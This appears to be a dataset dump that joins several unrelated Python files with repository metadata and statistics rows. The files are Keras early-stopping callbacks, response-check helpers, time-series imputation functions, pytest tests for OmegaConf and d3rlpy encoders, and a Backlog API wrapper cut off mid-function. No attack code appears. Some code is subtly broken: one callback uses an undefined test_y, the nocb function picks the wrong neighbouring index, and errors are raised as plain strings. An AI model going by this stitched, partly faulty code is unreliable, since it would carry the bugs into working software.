self.model.save(self.model_path)
self.wait = 0
# something here to print trec_eval doc
else:
self.wait += 1
if self.wait > int(self.conf['training']['patience']):
self.stopped_epoch = epoch
self.model.stop_training = True
if self.save and self.model.stop_training:
logger.info('Saving predictions to {0}'.format(self.conf['model']['path_saved_predictions']))
model_tools.save_predictions(self.conf['model']['path_saved_predictions'],test_y) #(filename,predictions)
logger.info('Testing: epoch: {0}, self.model.stop_training: {1}'.format(epoch,self.model.stop_training))
return
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
logging.info('Epoch %05d: early stopping', self.stopped_epoch + 1)
if self.conf.getint('model','save'):
self.model.load_weights(self.model_path)
save_model(self.model, self.conf['model']['path'],self.now)
return
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
return
class EarlyStoppingRankingAccuracySpedUpGiveModel(Callback):
''' Ranking accuracy callback with early stopping.
'''
def __init__(self, conf, val_data, concept_padded, corpus_padded, pretrained, create_spedup_model):
super().__init__()
self.conf = conf
self.val_data = val_data
self.concept_padded = concept_padded
self.corpus_padded = corpus_padded
self.pretrained = pretrained
self.convoluted_input = None
self.prediction_model = None
self.create_spedup_model = create_spedup_model
self.best = 0 # best accuracy
self.wait = 0
self.stopped_epoch = 0
self.model_path = conf['model']['path_model_whole']
self.save = int(self.conf['settings']['save_prediction'])
self.now = datetime.now().strftime('%Y%m%d-%H%M%S')
self.history = self.conf['settings']['history'] + self.now + '.txt'
write_training_info(self.conf,self.history)
def on_train_begin(self, logs={}):
self.losses = []
self.accuracy = []
self.wait = 0
with open(self.history,'a',encoding='utf-8') as fh:
# Pass the file handle in as a lambda function to make it callable
self.model.summary(print_fn=lambda x: fh.write(x + '\n'))
return
def on_epoch_end(self, epoch, logs={}):
self.losses.append(logs.get('loss'))
before = datetime.now()
self.convoluted_input, self.prediction_model = self.create_spedup_model(self.model,self.corpus_padded,self.concept_padded,self.pretrained)
test_y = self.prediction_model.predict(self.convoluted_input)
after = datetime.now()
logger.debug('Time taken for prediction with speedup:{0}'.format(after-before))
evaluation_parameter = evaluate(self.val_data.mentions, test_y, self.val_data.y)
self.accuracy.append(evaluation_parameter)
self.convoluted_input = None
self.prediction_model = None
with open(self.history,'a',encoding='utf-8') as f:
f.write('Epoch: {0}, Training loss: {1}, validation accuracy: {2}\n'.format(epoch,logs.get('loss'),evaluation_parameter))
if evaluation_parameter > self.best:
logging.info('Intermediate model saved.')
self.best = evaluation_parameter
self.model.save(self.model_path)
self.wait = 0
# something here to print trec_eval doc
else:
self.wait += 1
if self.wait > int(self.conf['training']['patience']):
self.stopped_epoch = epoch
self.model.stop_training = True
if self.save and self.model.stop_training:
logger.info('Saving predictions to {0}'.format(self.conf['model']['path_saved_predictions']))
model_tools.save_predictions(self.conf['model']['path_saved_predictions'],test_y) #(filename,predictions)
logger.info('Testing: epoch: {0}, self.model.stop_training: {1}'.format(epoch,self.model.stop_training))
return
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
logging.info('Epoch %05d: early stopping', self.stopped_epoch + 1)
try:
self.model.load_weights(self.model_path)
except OSError:
pass
# function in run_generator
# predict(self.conf, self.concept, self.positives, self.vocab, self.entity_model, self.concept_model,self.model, self.val_data, result=self.history)
if self.conf.getint('model','save'):
save_model(self.model, self.conf['model']['path'],self.now)
return
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
return
class EarlyStoppingRankingAccuracyGenerator(Callback):
''' Ranking accuracy callback with early stopping.
'''
def __init__(self, conf, concept, positives, vocab, entity_model, concept_model, original_model,val_data):
super().__init__()
self.conf = conf
self.concept = concept
self.positives = positives
self.vocab = vocab
self.entity_model = entity_model
self.concept_model = concept_model
self.original_model = original_model
self.val_data = val_data
self.best = 0 # best accuracy
self.wait = 0
self.stopped_epoch = 0
self.patience = int(conf['training']['patience'])
self.model_path = conf['model']['path_model_whole']
self.save = int(self.conf['settings']['save_prediction'])
self.now = datetime.now().strftime('%Y%m%d-%H%M%S')
self.history = self.conf['settings']['history'] + self.now + '.txt'
write_training_info(self.conf,self.history)
def on_train_begin(self, logs={}):
self.losses = []
self.accuracy = []
self.wait = 0
with open(self.history,'a',encoding='utf-8') as fh:
# Pass the file handle in as a lambda function to make it callable
self.original_model.summary(print_fn=lambda x: fh.write(x + '\n'))
return
def on_epoch_end(self, epoch, logs={}):
self.losses.append(logs.get('loss'))
evaluation_parameter = predict(self.conf, self.concept, self.positives, self.vocab, self.entity_model, self.concept_model,self.model, self.val_data)
self.accuracy.append(evaluation_parameter)
with open(self.history,'a',encoding='utf-8') as f:
f.write('Epoch: {0}, Training loss: {1}, validation accuracy: {2}\n'.format(epoch,logs.get('loss'),evaluation_parameter))
if evaluation_parameter > self.best:
logging.info('Intermediate model saved.')
self.best = evaluation_parameter
self.model.save(self.model_path)
self.wait = 0
# something here to print trec_eval doc
else:
self.wait += 1
if self.wait > int(self.conf['training']['patience']):
self.stopped_epoch = epoch
self.model.stop_training = True
if self.save and self.model.stop_training:
logger.info('Saving predictions to {0}'.format(self.conf['model']['path_saved_predictions']))
model_tools.save_predictions(self.conf['model']['path_saved_predictions'],test_y) #(filename,predictions)
logger.info('Testing: epoch: {0}, self.model.stop_training: {1}'.format(epoch,self.model.stop_training))
return
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
logging.info('Epoch %05d: early stopping', self.stopped_epoch + 1)
try:
self.model.load_weights(self.model_path)
except OSError:
pass
# function in run_generator
# predict(self.conf, self.concept, self.positives, self.vocab, self.entity_model, self.concept_model,self.model, self.val_data, result=self.history)
if self.conf.getint('model','save'):
save_model(self.model, self.conf['model']['path'],self.now)
return
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
return
| 37.626898
| 156
| 0.708232
| 2,452
| 17,346
| 4.840946
| 0.084421
| 0.046251
| 0.026959
| 0.035383
| 0.849031
| 0.842965
| 0.842965
| 0.841281
| 0.832856
| 0.825611
| 0
| 0.007534
| 0.150582
| 17,346
| 461
| 157
| 37.626898
| 0.798086
| 0.109074
| 0
| 0.816092
| 0
| 0
| 0.143256
| 0.025663
| 0
| 0
| 0
| 0
| 0.002874
| 1
| 0.08908
| false
| 0.017241
| 0.031609
| 0
| 0.198276
| 0.014368
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73fd5a05bd62856a766308103b3feb3d66e495ac
| 2,710
|
py
|
Python
|
little_finger/utils/requests_response_util.py
|
yromeMfOtuO/little-finger
|
6474366e6f8f9072584aa7f113a7f425544a7708
|
[
"Apache-2.0"
] | null | null | null |
little_finger/utils/requests_response_util.py
|
yromeMfOtuO/little-finger
|
6474366e6f8f9072584aa7f113a7f425544a7708
|
[
"Apache-2.0"
] | null | null | null |
little_finger/utils/requests_response_util.py
|
yromeMfOtuO/little-finger
|
6474366e6f8f9072584aa7f113a7f425544a7708
|
[
"Apache-2.0"
] | null | null | null |
"""
requests response处理,校验状态码及成功标志
默认response content-type 为 json
"""
import requests
def check_status(response: requests.Response, err_msg: str = None):
"""
check http response status is 200
:param response: requests http response
:param err_msg: exception error message
"""
if not str(response.status_code).startswith("2"):
if not err_msg:
err_msg = f"response status code: {response.status_code}, response content: {response.content}"
raise Exception(err_msg)
def check_flag(response: requests.Response, flag: str = 'success', err_msg: str = None):
"""
check http response status is 200, and check the business success flag
:param response: requests http response
:param flag: business flag key
:param err_msg: exception error message
"""
check_status(response, err_msg)
if not response.json()[flag]:
if not err_msg:
err_msg = f"business code is not success, response content: {response.content}"
raise Exception(err_msg)
def check_export(response: requests.Response, err_msg: str = None, data_key: str = None):
"""
check http response status is 200, and export response json
:param response: requests http response
:param err_msg: exception error message
:param data_key: data field key in json
:return: json
"""
check_status(response, err_msg)
return response.json() if not data_key else response.json()[data_key]
def check_export_data(response: requests.Response, err_msg: str = None):
"""
check http response status is 200, and export response json
:param response: requests http response
:param err_msg: exception error message
:return: json
"""
return check_export(response, err_msg, 'data')
def check_flag_export(response: requests.Response, flag: str = 'success', err_msg: str = None, data_key: str = None):
"""
check http response status is 200, and check the business success flag, then export response json
:param response: requests http response
:param flag: business flag key
:param err_msg: exception error message
:param data_key: data field key in json
"""
check_flag(response, flag, err_msg)
return response.json() if not data_key else response.json()[data_key]
def check_flag_export_data(response: requests.Response, flag: str = 'success', err_msg: str = None):
"""
check http response status is 200, and check the business success flag, then export response json
:param response: requests http response
:param flag: business flag key
:param err_msg: exception error message
"""
return check_flag_export(response, flag, err_msg, "data")
| 35.657895
| 117
| 0.704059
| 372
| 2,710
| 4.997312
| 0.11828
| 0.074233
| 0.077461
| 0.041958
| 0.817644
| 0.783217
| 0.783217
| 0.744486
| 0.744486
| 0.744486
| 0
| 0.008854
| 0.208118
| 2,710
| 75
| 118
| 36.133333
| 0.857409
| 0.429151
| 0
| 0.363636
| 0
| 0
| 0.129643
| 0.016752
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0
| 0.045455
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb7b368376b5efdcc142b272cee2e155e7c29ff7
| 6,798
|
py
|
Python
|
imputeTSpy/locf.py
|
zaenalium/imputeTSpy
|
7d34cdcd699606f908de6f3de17b6c6b9150091c
|
[
"MIT"
] | null | null | null |
imputeTSpy/locf.py
|
zaenalium/imputeTSpy
|
7d34cdcd699606f908de6f3de17b6c6b9150091c
|
[
"MIT"
] | null | null | null |
imputeTSpy/locf.py
|
zaenalium/imputeTSpy
|
7d34cdcd699606f908de6f3de17b6c6b9150091c
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
from check_data import check_data, consecutive
from tsAirgap import ts_airgap, ts_heating, ts_nh4
#from impyute.ops import error
#@wrapper.wrappers
#@wrapper.checks
def locf(data, na_remaining = "rev", maxgap = None):
""" Last Observation Carried Forward
For each set of missing indices, use the value of one row before(same
column). In the case that the missing value is the first row, look one
row ahead instead. If this next row is also NaN, look to the next row.
Repeat until you find a row in this column that's not NaN. All the rows
before will be filled with this value.
Parameters
----------
data: numpy.array, list or pandas.Series
Data to impute.
na_remaining : Method to be used for remaining nan (if missing number apear in the first observation) :
"keep" - to return the series with NAs
"mean" - to replace remaining NAs by overall mean
"rev" - to perform nocb / locf from the reverse direction
maxgap : Maximum number of successive NAs to still perform imputation on. Default setting is to replace all NAs without restrictions. With this option set, consecutive nan runs, that are longer than 'maxgap' will be left nan. This option mostly makes sense if you want to treat long runs of nan afterwards separately
Returns
-------
numpy.array
Imputed data.
Examples
------
import imputeTSpy
data = imputeTSpy.ts_nh4()
data_fill_locf = imputeTSpy.locf(data)
data_fill_nocb = imputeTSpy.nocb(data)
"""
data = check_data(data)
nan_xy = np.argwhere(np.isnan(data))
nan_xy_idx = np.array([x[0] for x in nan_xy])
if maxgap != None :
z = consecutive(nan_xy_idx)
exc = []
for i in range(len(z)) :
if len(z[i]) > maxgap :
exc.extend(z[i])
nan_xy_idx = nan_xy_idx[np.isin(nan_xy_idx, exc) == False]
else :
pass
n = data.shape[0]
n_int = np.arange(n)#[x for x in range(n)]
data_cp = data.copy()
for i in nan_xy_idx :
try :
cdd = n_int [n_int > i]
idx_rep = np.min(cdd[np.isin(cdd, nan_xy_idx) == False])
data_cp[i] = data_cp[idx_rep]
except :
if na_remaining == "rev" :
cdd = n_int [n_int < i]
idx_rep = np.max(cdd[np.isin(cdd, nan_xy_idx) == False])
data_cp[i] = data_cp[idx_rep]
elif na_remaining == "mean":
idx_rep = np.mean(data[np.isnan(data) == False])
data_cp[i] = idx_rep
elif na_remaining == "keep":
pass
else :
raise("the option is invalid, please fill valid option!!!!")
return data_cp
def nocb(data, axis=0, na_remaining = "rev", maxgap = None):
""" Next Observation Carried Backward
For each set of missing indices, use the value of one row before(same
column). In the case that the missing value is the first row, look one
row ahead instead. If this next row is also NaN, look to the next row.
Repeat until you find a row in this column that's not NaN. All the rows
before will be filled with this value.
Parameters
----------
data: numpy.array, list or pandas.Series
Data to impute.
na_remaining : Method to be used for remaining nan (if missing number apear in the first observation) :
"keep" - to return the series with NAs
"mean" - to replace remaining NAs by overall mean
"rev" - to perform nocb / locf from the reverse direction
maxgap : Maximum number of successive NAs to still perform imputation on. Default setting is to replace all NAs without restrictions. With this option set, consecutive nan runs, that are longer than 'maxgap' will be left nan. This option mostly makes sense if you want to treat long runs of nan afterwards separately
Returns
-------
numpy.ndarray
Imputed data.
Examples
------
import imputeTSpy
data = imputeTSpy.ts_nh4()
data_fill_locf = imputeTSpy.locf(data)
data_fill_nocb = imputeTSpy.nocb(data)
"""
data = check_data(data)
nan_xy = np.argwhere(np.isnan(data))
nan_xy_idx = np.array([x[0] for x in nan_xy])
if maxgap != None :
z = consecutive(nan_xy_idx)
exc = []
for i in range(len(z)) :
if len(z[i]) > maxgap :
exc.extend(z[i])
nan_xy_idx = nan_xy_idx[np.isin(nan_xy_idx, exc) == False]
else :
pass
n = data.shape[0]
n_int = np.arange(n)#[x for x in range(n)]
data_cp = data.copy()
for i in nan_xy_idx :
try :
cdd = n_int [n_int < i]
idx_rep = np.min(cdd[np.isin(cdd, nan_xy_idx) == False])
data_cp[i] = data_cp[idx_rep]
except :
if na_remaining == "rev" :
cdd = n_int [n_int > i]
idx_rep = np.max(cdd[np.isin(cdd, nan_xy_idx) == False])
data_cp[i] = data_cp[idx_rep]
elif na_remaining == "mean":
idx_rep = np.mean(data[np.isnan(data) == False])
data_cp[i] = idx_rep
elif na_remaining == "keep":
pass
else :
raise("the option is invalid, please fill valid option!!!!")
return data_cp
#data = ts_nh4()
#data[-2:] =[np.nan, np.nan]
#nan_xy = np.argwhere(np.isnan(data))
#nan_xy_idx = np.array([x[0] for x in nan_xy])
#n = data.shape[0]
#n_int = np.arange(n)#[x for x in range(n)]
#
#np.diff(np.append(i, z)) != 1
#max_gap = 10
#
#
##z = nan_xy_idx[nan_xy_idx > i]
##a = np.array([0, 47, 48, 49, 50, 97, 98, 99])
#if maxgap != None :
# z = consecutive(nan_xy_idx)
# exc = []
# for i in range(len(z)) :
# if len(z[i]) > max_gap :
# exc.extend(z[i])
# nan_xy_idx = nan_xy_idx[np.isin(nan_xy_idx, exc) == False]
#else :
# pass
#
#data_cp = data.copy()
#na_remaining = "mean"
#for i in nan_xy_idx :
# try :
# cdd = n_int [n_int > i]
# idx_rep = np.min(cdd[np.isin(cdd, nan_xy_idx) == False])
# data_cp[i] = data_cp[idx_rep]
# except :
# if na_remaining == "rev" :
# cdd = n_int [n_int < i]
# idx_rep = np.max(cdd[np.isin(cdd, nan_xy_idx) == False])
# data_cp[i] = data_cp[idx_rep]
# elif na_remaining == "mean":
# idx_rep = np.nanmean(data)
# data_cp[i] = idx_rep
# elif na_remaining == "keep":
# pass
# else :
# raise("the option is invalid, please fill valid option!!!!")
#
#
#z = nan_xy_idx[nan_xy_idx > i]
| 34.160804
| 320
| 0.584437
| 1,023
| 6,798
| 3.738025
| 0.168133
| 0.044456
| 0.058577
| 0.025105
| 0.900889
| 0.888337
| 0.888337
| 0.888337
| 0.878923
| 0.878923
| 0
| 0.006367
| 0.306855
| 6,798
| 198
| 321
| 34.333333
| 0.805178
| 0.55075
| 0
| 0.916667
| 0
| 0
| 0.047324
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0.055556
| 0.055556
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
fba4a3ec34dc4ed9b13643fc80a87a6a38904d8b
| 625
|
py
|
Python
|
tests/examples/test_postponed_annotations.py
|
jeffknaide/omegaconf
|
e7f7db4c60509de068990b5af9ec30d29f1369be
|
[
"BSD-3-Clause"
] | null | null | null |
tests/examples/test_postponed_annotations.py
|
jeffknaide/omegaconf
|
e7f7db4c60509de068990b5af9ec30d29f1369be
|
[
"BSD-3-Clause"
] | null | null | null |
tests/examples/test_postponed_annotations.py
|
jeffknaide/omegaconf
|
e7f7db4c60509de068990b5af9ec30d29f1369be
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
import pytest
@pytest.mark.skipif(sys.version_info < (3, 7), reason="requires Python 3.7")
def test_simple_types_class_postponed() -> None:
# import from a module which has `from __future__ import annotations`
from tests.examples.dataclass_postponed_annotations import simple_types_class
simple_types_class()
@pytest.mark.skipif(sys.version_info < (3, 7), reason="requires Python 3.7")
def test_conversions_postponed() -> None:
# import from a module which has `from __future__ import annotations`
from tests.examples.dataclass_postponed_annotations import conversions
conversions()
| 31.25
| 81
| 0.7712
| 84
| 625
| 5.452381
| 0.357143
| 0.017467
| 0.104803
| 0.082969
| 0.777293
| 0.777293
| 0.777293
| 0.777293
| 0.777293
| 0.777293
| 0
| 0.014925
| 0.1424
| 625
| 19
| 82
| 32.894737
| 0.839552
| 0.216
| 0
| 0.2
| 0
| 0
| 0.078029
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fbc578561bc3f1f14716f1751a6ae8f75ea26e4f
| 6,248
|
py
|
Python
|
tests/models/torch/test_encoders.py
|
YangRui2015/d3rlpy
|
da778b2a2b0afbafe25395296baecd0d4d0cd0d5
|
[
"MIT"
] | 1
|
2021-05-08T06:21:05.000Z
|
2021-05-08T06:21:05.000Z
|
tests/models/torch/test_encoders.py
|
YangRui2015/d3rlpy
|
da778b2a2b0afbafe25395296baecd0d4d0cd0d5
|
[
"MIT"
] | null | null | null |
tests/models/torch/test_encoders.py
|
YangRui2015/d3rlpy
|
da778b2a2b0afbafe25395296baecd0d4d0cd0d5
|
[
"MIT"
] | null | null | null |
import pytest
import torch
from d3rlpy.models.torch.encoders import (
PixelEncoder,
PixelEncoderWithAction,
VectorEncoder,
VectorEncoderWithAction,
)
from .model_test import check_parameter_updates
@pytest.mark.parametrize("shapes", [((4, 84, 84), 3136)])
@pytest.mark.parametrize("filters", [[(32, 8, 4), (64, 4, 2), (64, 3, 1)]])
@pytest.mark.parametrize("feature_size", [512])
@pytest.mark.parametrize("batch_size", [32])
@pytest.mark.parametrize("use_batch_norm", [False, True])
@pytest.mark.parametrize("dropout_rate", [None, 0.2])
@pytest.mark.parametrize("activation", [torch.relu])
def test_pixel_encoder(
shapes,
filters,
feature_size,
batch_size,
use_batch_norm,
dropout_rate,
activation,
):
observation_shape, linear_input_size = shapes
encoder = PixelEncoder(
observation_shape=observation_shape,
filters=filters,
feature_size=feature_size,
use_batch_norm=use_batch_norm,
dropout_rate=dropout_rate,
activation=activation,
)
x = torch.rand((batch_size,) + observation_shape)
y = encoder(x)
# check output shape
assert encoder._get_linear_input_size() == linear_input_size
assert y.shape == (batch_size, feature_size)
# check use of batch norm
encoder.eval()
eval_y = encoder(x)
if use_batch_norm or dropout_rate:
assert not torch.allclose(y, eval_y)
else:
assert torch.allclose(y, eval_y)
# check layer connection
check_parameter_updates(encoder, (x,))
@pytest.mark.parametrize("shapes", [((4, 84, 84), 3136)])
@pytest.mark.parametrize("action_size", [2])
@pytest.mark.parametrize("filters", [[(32, 8, 4), (64, 4, 2), (64, 3, 1)]])
@pytest.mark.parametrize("feature_size", [512])
@pytest.mark.parametrize("batch_size", [32])
@pytest.mark.parametrize("use_batch_norm", [False, True])
@pytest.mark.parametrize("dropout_rate", [None, 0.2])
@pytest.mark.parametrize("discrete_action", [False, True])
@pytest.mark.parametrize("activation", [torch.relu])
def test_pixel_encoder_with_action(
shapes,
action_size,
filters,
feature_size,
batch_size,
use_batch_norm,
dropout_rate,
discrete_action,
activation,
):
observation_shape, linear_input_size = shapes
encoder = PixelEncoderWithAction(
observation_shape=observation_shape,
action_size=action_size,
filters=filters,
feature_size=feature_size,
use_batch_norm=use_batch_norm,
dropout_rate=dropout_rate,
discrete_action=discrete_action,
activation=activation,
)
x = torch.rand((batch_size,) + observation_shape)
if discrete_action:
action = torch.randint(0, action_size, size=(batch_size, 1))
else:
action = torch.rand((batch_size, action_size))
y = encoder(x, action)
# check output shape
assert encoder._get_linear_input_size() == linear_input_size + action_size
assert y.shape == (batch_size, feature_size)
# check use of batch norm
encoder.eval()
eval_y = encoder(x, action)
if use_batch_norm or dropout_rate:
assert not torch.allclose(y, eval_y)
else:
assert torch.allclose(y, eval_y)
# check layer connection
check_parameter_updates(encoder, (x, action))
@pytest.mark.parametrize("observation_shape", [(100,)])
@pytest.mark.parametrize("hidden_units", [[256, 256]])
@pytest.mark.parametrize("batch_size", [32])
@pytest.mark.parametrize("use_batch_norm", [False, True])
@pytest.mark.parametrize("dropout_rate", [None, 0.2])
@pytest.mark.parametrize("use_dense", [False, True])
@pytest.mark.parametrize("activation", [torch.relu])
def test_vector_encoder(
observation_shape,
hidden_units,
batch_size,
use_batch_norm,
dropout_rate,
use_dense,
activation,
):
encoder = VectorEncoder(
observation_shape=observation_shape,
hidden_units=hidden_units,
use_batch_norm=use_batch_norm,
dropout_rate=dropout_rate,
use_dense=use_dense,
activation=activation,
)
x = torch.rand((batch_size,) + observation_shape)
y = encoder(x)
# check output shape
assert encoder.get_feature_size() == hidden_units[-1]
assert y.shape == (batch_size, hidden_units[-1])
# check use of batch norm
encoder.eval()
eval_y = encoder(x)
if use_batch_norm or dropout_rate:
assert not torch.allclose(y, eval_y)
else:
assert torch.allclose(y, eval_y)
# check layer connection
check_parameter_updates(encoder, (x,))
@pytest.mark.parametrize("observation_shape", [(100,)])
@pytest.mark.parametrize("action_size", [2])
@pytest.mark.parametrize("hidden_units", [[256, 256]])
@pytest.mark.parametrize("batch_size", [32])
@pytest.mark.parametrize("use_batch_norm", [False, True])
@pytest.mark.parametrize("dropout_rate", [None, 0.2])
@pytest.mark.parametrize("use_dense", [False, True])
@pytest.mark.parametrize("discrete_action", [False, True])
@pytest.mark.parametrize("activation", [torch.relu])
def test_vector_encoder(
observation_shape,
action_size,
hidden_units,
batch_size,
use_batch_norm,
dropout_rate,
use_dense,
discrete_action,
activation,
):
encoder = VectorEncoderWithAction(
observation_shape=observation_shape,
action_size=action_size,
hidden_units=hidden_units,
use_batch_norm=use_batch_norm,
dropout_rate=dropout_rate,
use_dense=use_dense,
discrete_action=discrete_action,
activation=activation,
)
x = torch.rand((batch_size,) + observation_shape)
if discrete_action:
action = torch.randint(0, action_size, size=(batch_size, 1))
else:
action = torch.rand((batch_size, action_size))
y = encoder(x, action)
# check output shape
assert encoder.get_feature_size() == hidden_units[-1]
assert y.shape == (batch_size, hidden_units[-1])
# check use of batch norm
encoder.eval()
eval_y = encoder(x, action)
if use_batch_norm or dropout_rate:
assert not torch.allclose(y, eval_y)
else:
assert torch.allclose(y, eval_y)
# check layer connection
check_parameter_updates(encoder, (x, action))
| 29.752381
| 78
| 0.68822
| 785
| 6,248
| 5.217834
| 0.095541
| 0.078125
| 0.164063
| 0.037109
| 0.899414
| 0.899414
| 0.899414
| 0.899414
| 0.847656
| 0.822754
| 0
| 0.018354
| 0.18902
| 6,248
| 209
| 79
| 29.894737
| 0.790014
| 0.042093
| 0
| 0.877193
| 0
| 0
| 0.060616
| 0
| 0
| 0
| 0
| 0
| 0.093567
| 1
| 0.023392
| false
| 0
| 0.023392
| 0
| 0.046784
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7efe82255fe75dd3c26f5fbb39c2ef16afa0d50
| 73,707
|
py
|
Python
|
bklv2/api.py
|
etecor/bklv2
|
aa4373ed51c3bade65c78e41921261f233e39a7f
|
[
"MIT"
] | null | null | null |
bklv2/api.py
|
etecor/bklv2
|
aa4373ed51c3bade65c78e41921261f233e39a7f
|
[
"MIT"
] | null | null | null |
bklv2/api.py
|
etecor/bklv2
|
aa4373ed51c3bade65c78e41921261f233e39a7f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
import shutil
import requests
import json
import rfc6266
def _gpath( path ):
"""
"https://test.backlog.jp/" -> "https://test.backlog.jp/"
"https://test.backlog.jp" -> "https://test.backlog.jp/"
"""
if path == "":
return "./"
elif path.endswith( "/" ):
return path
else:
return path + "/"
def _addkw( dic, k, w ):
"""
dic[] -> dic[k] = w
"""
if w != None:
if isinstance( w, ( tuple, list ) ):
for i, v in w:
_addkw( dic, k + "[" + i + "]", v )
elif isinstance( w, bool ):
if w == True:
dic[k] = "true"
else:
dic[k] = "false"
elif isinstance( w, datetime.date ):
dic[k] = w.strftime( "%Y-%m-%d" )
else:
dic[k] = w
def _addkws( dic, k, w ):
"""
dic[] -> dic[k[]] = w[]
"""
if w != None:
if isinstance( w, ( tuple, list ) ):
i=0
for v in w:
_addkw( dic, k + "[" + str(i) + "]", v )
i+=1
else:
_addkw( dic, k + "[0]", w )
def _dicset( dic, k, w, tuples ):
for t in tuples:
if k==t:
_addkws( dic, k[0:-1], w )
return
_addkw( dic, k, w )
class api( object ):
"""
Backlog API version 2 wrapper
"""
def __init__( self, hostname, apikey ):
"""
hostname: "https://[spacename].backlog.jp"
apikey: "nWdhOFxDpAlsFTGSIHisRkUvTq5eTiBDBJ0FFqAdtLTSIvKpfkvb09Kteststring"
"""
if hostname.endswith( "/" ):
self.hostname = hostname.rstrip("/")
else:
self.hostname = hostname
self.apikey = apikey
def _makeurl( self, path ):
return self.hostname + path
def _api_return( self, response, **kwargs ):
self.response = response
output="json"
dir_path = "./"
for k, v in kwargs.items():
if k == "output":
output = v
elif k == "dirpath":
dirpath = v
if output == "json":
try:
return json.loads( self.response.text )
except:
return {}
elif output == "response":
return response
elif output == "path":
if response.status_code == 200:
rr = rfc6266.parse_requests_response( response )
p = _gpath( dirpath ) + rr.filename_unsafe
with open( p, 'wb' ) as fp:
response.raw.decode_content = True
shutil.copyfileobj( response.raw, fp )
return p
return self.response.text
def getSpace( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-space
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/space" )
return self._api_return(
requests.get( url, params = params ) )
def getRecentUpdates( self,
activityTypeIds = None,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-recent-updates
"""
params = { "apiKey": self.apikey }
_addkws( params, "activityTypeId", activityTypeIds )
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/space/activities" )
return self._api_return(
requests.get( url, params = params ) )
def getSpaceLogo( self,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-space-logo
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/space/image" )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def getSpaceNotification( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-space-notification
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/space/notification" )
return self._api_return(
requests.get( url, params = params ) )
def updateSpaceNotification( self, content ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-space-notification
"""
params = { "apiKey": self.apikey }
data = { "content": content }
url = self._makeurl( "/api/v2/space/notification" )
return self._api_return(
requests.put( url, params = params, data = data ) )
def getSpaceDiskUsage( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-space-disk-usage
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/space/diskUsage" )
return self._api_return(
requests.get( url, params = params ) )
def postAttachmentFile( self, filepath ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/post-attachment-file
"""
params = { "apiKey": self.apikey }
fp = open( filepath, "rb" )
files = { "file": [ requests.utils.guess_filename( fp ),
fp.read(),
"application/octet-stream" ] }
fp.close()
url = self._makeurl( "/api/v2/space/attachment" )
return self._api_return(
requests.post( url, params = params, files = files ) )
def getUserList( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-user-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/users" )
return self._api_return(
requests.get( url, params = params ) )
def getUser( self, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-user
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/users/" + str( userId ) )
return self._api_return(
requests.get( url, params = params ) )
def addUser( self, userId, password, name, mailAddress, roleType ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-user
"""
params = { "apiKey": self.apikey }
data = { "userId": userId, "password": password, "name": name,
"mailAddress": mailAddress, "roleType": roleType }
